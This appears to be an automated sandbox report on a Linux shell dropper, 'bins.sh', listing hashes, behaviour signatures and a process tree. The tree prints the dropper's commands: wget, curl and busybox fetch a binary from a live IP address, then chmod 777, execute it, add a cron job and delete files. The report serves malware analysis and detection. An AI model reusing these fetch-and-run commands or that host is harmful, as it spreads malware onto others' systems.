Analysis
-
max time kernel
150s -
max time network
153s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
01/12/2024, 22:31
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
7187e723d6c6ea19e696987e38c40047
-
SHA1
2c99d3c07e904340b7d1bcec7afd801fd513c89b
-
SHA256
6901f203d1426288bdbc5d00984e7c0b3f5858fe8fd416414acec6008b364fe9
-
SHA512
809dbae9c9c2c1d24653f28bc97f465a8db299c250acee7370187698501afba9c55cd1935d07ed5054a10bfa753648c8f951ac7d1cc04c4818674bc67c1cef85
-
SSDEEP
192:hWHDT6y8LZfhfRfBfMfwfvg8UzTNR9+B1te+SbtRp+eQjfhfRfBfMfwfrg8UzT/U:hFLhpZJGier+B1te+S2TpZJGiRB1te+x
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 687 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 688 g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 -
Renames itself 1 IoCs
pid Process 689 g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.TxgGaB crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/272/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/708/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/733/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/788/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/406/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/698/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/852/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/828/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/856/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/258/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/645/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/650/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/712/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/721/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/729/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/757/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/783/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/850/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/860/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/884/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/26/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/745/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/782/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/845/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/29/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/344/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/802/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/835/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/859/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/892/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/13/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/300/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/697/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/702/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/758/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/771/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/151/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/716/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/725/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/814/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/714/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/763/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/857/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/879/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/11/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/795/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/853/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/76/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/817/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/888/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/273/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/791/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/803/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/833/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/837/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/893/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/883/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/291/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/657/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/718/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/834/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/865/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/108/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 File opened for reading /proc/737/cmdline g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 -
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 wget File opened for modification /tmp/g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 curl File opened for modification /tmp/g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0 busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:653
-
/bin/rm/bin/rm bins.sh2⤵PID:655
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W02⤵
- Writes file to tmp directory
PID:664
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W02⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:684
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W02⤵
- Writes file to tmp directory
PID:686
-
-
/bin/chmodchmod 777 g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W02⤵
- File and Directory Permissions Modification
PID:687
-
-
/tmp/g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0./g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W02⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:688 -
/bin/shsh -c "crontab -l"3⤵PID:690
-
/usr/bin/crontabcrontab -l4⤵PID:691
-
-
-
/bin/shsh -c "crontab -"3⤵PID:694
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:695
-
-
-
-
/bin/rmrm g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W02⤵PID:699
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/je2N9IXFhuTiWlmM0jstIexofrtcLrmPjQ2⤵PID:702
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
177KB
MD5786d75a158fe731feca3880f436082c0
SHA179ea2734e43d00cdeabed5586b2c1994d02aef3e
SHA2565fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18
SHA5127984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f
-
Filesize
210B
MD536ef50a4c7c5111de6cb32084d008ed1
SHA1f4b2afdde330bbc809d52c2d28525fa0b8f30a24
SHA2567589c71ad368ff14c6a059bcfe2db02f2917d78835525cc4e1b39cfcd84837a3
SHA51236a7b56b7f9beb07db1d4e60dd3259c64675ee53f9acdeba502d62fad3febbc7c6f54f06f38772ed3340c99d67c020a5a5caa6aa63f6b48de1515bd8a2d80ba0